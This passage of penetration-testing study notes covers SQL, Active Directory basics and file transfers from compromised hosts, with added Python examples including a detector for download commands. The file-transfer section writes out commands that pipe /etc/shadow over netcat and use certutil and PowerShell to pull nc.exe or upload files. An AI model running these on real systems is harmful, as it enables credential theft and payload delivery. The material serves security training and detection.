certain HTTP methods only.
20. SQL is a querying language used to interface with a database. It tells the
database what data the web application wants, what kind of conditions
the data must meet, how to organize the results, and much more. The
database processes the SQL statement and determines what data
matches the statement's conditions. SQL syntax is designed to be
human-readable.
21. SELECT statements, along with WHERE clauses, make up the basics of
using SQL to extract information from a database. The JOIN and UNION
operators allow us to combine rows of data from multiple tables.
22. A primary key is a unique identifier for a row of data in a table. It can
be any type of value as long as each row in the table has a unique
value. A foreign key is a column that references a primary key in a
different table.
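As an added example (not from these notes), the following Python uses an in-memory SQLite database to show the SELECT/WHERE, JOIN and UNION operations of item 21 and the primary/foreign key relationship of item 22; every table, column and value is made up.

```python
import sqlite3

# Added example (not from the PEN-100 notes): an in-memory SQLite database with
# two tables linked by a primary/foreign key, exercising the SELECT/WHERE, JOIN
# and UNION operations described above. Table and column names are made up.
SCHEMA = """
CREATE TABLE users (
    id       INTEGER PRIMARY KEY,                   -- primary key: unique per row
    username TEXT NOT NULL UNIQUE
);
CREATE TABLE logins (
    id      INTEGER PRIMARY KEY,
    user_id INTEGER NOT NULL REFERENCES users(id),  -- foreign key into users
    src_ip  TEXT NOT NULL
);
"""

def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("PRAGMA foreign_keys = ON")  # SQLite ignores FKs unless enabled
    conn.executescript(SCHEMA)
    conn.executemany("INSERT INTO users(id, username) VALUES (?, ?)",
                     [(1, "alice"), (2, "bob")])
    conn.executemany("INSERT INTO logins(user_id, src_ip) VALUES (?, ?)",
                     [(1, "10.0.0.5"), (1, "10.0.0.9"), (2, "10.0.0.5")])
    return conn

def logins_for(conn, username):
    """SELECT + WHERE + JOIN: combine rows of both tables matched on the key."""
    sql = ("SELECT u.username, l.src_ip FROM logins l "
           "JOIN users u ON u.id = l.user_id "
           "WHERE u.username = ? ORDER BY l.id")
    return conn.execute(sql, (username,)).fetchall()

def all_names_and_ips(conn):
    """UNION stacks two result sets with the same column count, dropping duplicates."""
    sql = ("SELECT username AS item FROM users "
           "UNION SELECT src_ip FROM logins ORDER BY item")
    return [row[0] for row in conn.execute(sql)]

def rejects_orphan_login(conn):
    """Foreign key check: a login row pointing at a missing user is refused."""
    try:
        conn.execute("INSERT INTO logins(user_id, src_ip) VALUES (?, ?)",
                     (99, "10.0.0.1"))
        return False
    except sqlite3.IntegrityError:
        return True
```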

Introduction to Active Directory


1. A directory is a hierarchical structure that stores information about
objects on the network. Active Directory(AD) is a Microsoft technology
used to manage computers and other devices on a network.
2. The purpose of Active Directory Domain Services (ADDS), commonly
called Active Directory, is to provide a scalable and centralized IT
management, authentication, and authorization framework.
3. The main element of Active Directory is the Domain Controller (DC). It
stores all relevant information for the Forest and provides all key
authentication and authorization services. Additionally, it also contains
all the core and native management services.
4. The first domain that you deploy in an Active Directory forest is called
the forest root domain. This domain remains the forest root domain for
the life cycle of the ADDS deployment. The forest root domain contains
the Enterprise Admins and Schema Admins groups. These service
administrator groups are used to manage forest-level operations such as
the addition and removal of domains and the implementation of changes
to the schema.
5. The main network protocol used to facilitate both authentication and
authorization in Active Directory is called Kerberos. The current Kerberos
authentication protocol, used by Microsoft, is adopted from the Kerberos
version 5 authentication protocol created by MIT.
6. The Kerberos protocol defines how clients interact with a network
authentication service. Clients obtain tickets from the Kerberos Key
Distribution Center (KDC), and they present these tickets to servers
when connections are established. Kerberos tickets represent the
client's network credentials.
7. Lightweight Directory Access Protocol(LDAP) is an open-source protocol
designed to interact with directory services. LDAP is also easy to
interact with from a scripting language like PowerShell.
8. Active Directory Federation Service(ADFS) provides an extended way of
offering single sign-on and authorization, while Active Directory
Certification Services(ADCS) provides an integrated certification authority
to handle the public key infrastructure.
9. Everything inside Active Directory is stored as objects. This also includes
the major elements such as users and computers. To ensure a unique
naming convention for all objects, Active Directory assigns all objects a
Security Identifier or SID.
10. In Active Directory, two major types of groups exist: Distribution groups
and Security groups. Distribution groups are only used to define email
lists and do not have any access rights or permission abilities. Security
groups on the other hand are used for exactly this purpose.
11. The notion of group membership within group membership is called nested
groups and is very commonly used in Active Directory. The power of
nested groups is its flexibility, as any user or group can be dynamically
added or removed from a group to provide the desired access.
12. Active Directory provides a solution for managing many settings through
Group Policy Objects also called GPOs. A GPO is a series of XML files that
contain settings and configurations for a multitude of applications and
options in Windows.

File Transfers
1. There are multiple ways to transfer files from a Linux target machine
such as:
i. Web-based file transfers: After you have gained shell access on the
target machine you could host a Python or Apache2 web server on that
machine and download files onto your machine and vice-versa. You could
also create a custom .php on your web server to upload files from the
target machine.
ii. Netcat:
nc 192.168.48.3 4444 < /etc/shadow
iii. Secure Copy:
scp offsec@192.168.50.151:/home/offsec/.bash_history offsecHistory.txt
iv. FTP: Download: get secret.txt Upload: put exploit.sh
v. TFTP: Very trivial or basic form of FTP. By default, we can not list
files through TFTP. However, if we already know the filename, we can
download files with get or upload using put.
2. FTP connections use a command channel for commands and a data
channel for data. In a default configuration, passive mode will combine
these channels on TCP port 21 and all communication will occur in that
client-initiated session. Alternatively, an active connection uses TCP
ports 20 and 21 for the data and command channels respectively,
requiring a server-initiated connection to the client.
3. Binary and ASCII modes describe ways of transferring specific types of
files. If the file is a text file, ASCII mode will suffice. If a text file is
transferred from a UNIX system to a Microsoft system, ASCII mode will
automatically add a carriage return to each newline (LF becomes CRLF). This
ensures compatibility with reading a text file when transferred from one
type of system to another.
4. Binary mode will keep the file in its original state, without modifying the
newline entries. If transferring an executable, Binary mode is the best
choice. Otherwise, the execution of the binary may become corrupted
due to the modification of the new line entries.
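The newline translation described in items 3 and 4, as an added Python simulation (not from the notes): ASCII mode rewrites LF as CRLF, which is harmless for a text file but alters any executable that happens to contain the byte 0x0a; both sample files are constructed.

```python
import hashlib

# Added example (not from the notes): simulates what FTP ASCII mode does to a
# file's bytes on a UNIX (LF) to Windows (CRLF) transfer, and why Binary mode
# is needed for executables. The two sample files below are constructed.

def ascii_mode_to_windows(data: bytes) -> bytes:
    """ASCII mode: each LF newline is rewritten as CRLF (a CR is added)."""
    return data.replace(b"\n", b"\r\n")

def binary_mode(data: bytes) -> bytes:
    """Binary mode: the byte stream is copied unchanged."""
    return data

def transfer(data: bytes, mode: str) -> bytes:
    if mode == "ascii":
        return ascii_mode_to_windows(data)
    if mode == "binary":
        return binary_mode(data)
    raise ValueError("mode must be 'ascii' or 'binary'")

def looks_like_text(data: bytes) -> bool:
    """Mode-selection heuristic: NUL bytes or invalid UTF-8 mean 'binary'."""
    if b"\x00" in data:
        return False
    try:
        data.decode("utf-8")
    except UnicodeDecodeError:
        return False
    return True

def check_integrity(sent: bytes, received: bytes) -> bool:
    """Compare a hash on both ends after the transfer; a mismatch means the
    bytes were altered in transit (expected for ASCII mode on text, fatal
    for an executable)."""
    return hashlib.sha256(sent).digest() == hashlib.sha256(received).digest()

# Constructed samples: a UNIX text file and a fake executable whose payload
# contains the byte 0x0a, which ASCII mode would mistake for a newline.
TEXT_FILE = b"first line\nsecond line\n"
FAKE_BINARY = b"\x7fELF" + b"\x00\x01\x0a\x02\x0a\xff"

if __name__ == "__main__":
    for name, blob in (("text", TEXT_FILE), ("binary", FAKE_BINARY)):
        mode = "ascii" if looks_like_text(blob) else "binary"
        got = transfer(blob, mode)
        print(f"{name}: {mode} mode, {len(blob)} -> {len(got)} bytes,",
              "intact" if check_integrity(blob, got) else "modified")
```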
5. Trivial File Transfer Protocol (TFTP) is a UDP-based file transfer protocol
and is often restricted by corporate egress firewall rules. During a
penetration test, we can use TFTP to transfer files from older Windows
operating systems up to Windows XP and 2003.
6. Many IoT and small form-factor networking devices will have TFTP
installed and configured for firmware updates.
7. Daemons are utility programs that run silently in the background to
monitor and take care of certain subsystems to ensure that the operating
system runs properly. A printer daemon monitors and takes care of
printing services. A network daemon monitors and maintains network
communications, and so on.
8. When accessing a Windows system, we must identify tools that exist in
the current installation that we can leverage to transfer files. The
concept of utilizing pre-existing applications is called living off the land.
9. There are multiple ways to transfer files from a Windows target machine
like:
i. certutil: Download files from the host's web server.
certutil -urlcache -split -f http://192.168.48.3/nc.exe nc.exe
ii. bitsadmin: Download a file from the host's web server. Doesn't work
with a Python web server.
bitsadmin /create MyDownloadExample
bitsadmin /addfile MyDownloadExample http://IP/file C:\FULLPATH\file
bitsadmin /resume MyDownloadExample
bitsadmin /info MyDownloadExample /verbose
bitsadmin /complete MyDownloadExample
iii. PowerShell: System.Net.WebClient or wget (alias of Invoke-WebRequest)
Download: powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.48.3/nc.exe', 'nc.exe')
Download: wget http://192.168.48.3/nc.exe -OutFile nc.exe
Upload: powershell (New-Object System.Net.WebClient).UploadFile('http://192.168.48.3/uploadWindows.php', '.\Secrets.jpg')
10. First, we must allow execution of PowerShell scripts (which is restricted
by default) with the -ExecutionPolicy keyword and Bypass value. Next,
we will use -NoLogo and -NonInteractive to hide the PowerShell logo
banner and suppress the interactive PowerShell prompt, respectively.
The -NoProfile keyword will prevent PowerShell from loading the default
profile (which is not needed), and we'll specify the script file with
-File.
11. Two ways of transferring files on Windows using Powershell:
a. System.Net.WebClient
b. Invoke-WebRequest
12. We could also have adapted the PHP script designed for the Linux target
for use on Windows with cURL, but the PowerShell cmdlet does not allow
easy use of the parameter in the request, hence we use another
parameterless PHP script designed for Windows to upload files to the host
machine.
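From the defender's side, the living-off-the-land transfers in items 9 to 11 leave recognisable process command lines. The following Python detector is an added example (not from the notes): it scans constructed command-line strings, such as a process-creation event would carry, for the certutil, bitsadmin and PowerShell patterns described above; the rule names, the sample lines and the local paths are made up.

```python
import re

# Added example (not part of the notes): a detector for the living-off-the-land
# download techniques listed above, run over constructed process command lines
# such as a Sysmon process-creation event would carry. Rule names are made up;
# the patterns cover only the commands described in the notes.
URL_RX = re.compile(r"https?://[^\s'\"),]+")
RULES = [
    ("certutil-download",
     re.compile(r"\bcertutil(\.exe)?\b.*-urlcache\b.*\s-f\s.*https?://", re.I)),
    ("bitsadmin-transfer",
     re.compile(r"\bbitsadmin(\.exe)?\b.*/addfile\b.*https?://", re.I)),
    ("powershell-webclient",
     re.compile(r"\bpowershell(\.exe)?\b.*System\.Net\.WebClient\b.*"
                r"\.(DownloadFile|UploadFile)\s*\(", re.I)),
    ("powershell-iwr",
     re.compile(r"\bpowershell(\.exe)?\b.*\b(Invoke-WebRequest|iwr|wget|curl)\b.*https?://", re.I)),
    ("powershell-bypass-script",
     re.compile(r"\bpowershell(\.exe)?\b.*-ExecutionPolicy\s+Bypass\b.*\s-File\s", re.I)),
]

def classify(cmdline):
    """Return the names of every rule the command line matches."""
    return [name for name, rx in RULES if rx.search(cmdline)]

def scan(cmdlines):
    """One finding per (command line, rule) pair, with the remote URL if present."""
    findings = []
    for line in cmdlines:
        for name in classify(line):
            m = URL_RX.search(line)
            findings.append({"tool": name, "url": m.group(0) if m else None, "cmd": line})
    return findings

# Constructed sample command lines (the IPs and file names mirror the notes).
SAMPLE_CMDLINES = [
    "certutil -urlcache -split -f http://192.168.48.3/nc.exe nc.exe",
    "bitsadmin /addfile MyDownloadExample http://192.168.48.3/nc.exe C:\\Users\\Public\\nc.exe",
    "powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.48.3/nc.exe', 'nc.exe')",
    "powershell -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File C:\\Users\\Public\\run.ps1",
    "certutil -hashfile C:\\Windows\\notepad.exe SHA256",   # benign use of certutil
    "powershell.exe Get-Process",                            # benign
]

if __name__ == "__main__":
    for f in scan(SAMPLE_CMDLINES):
        print(f["tool"], f["url"], "<-", f["cmd"])
```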
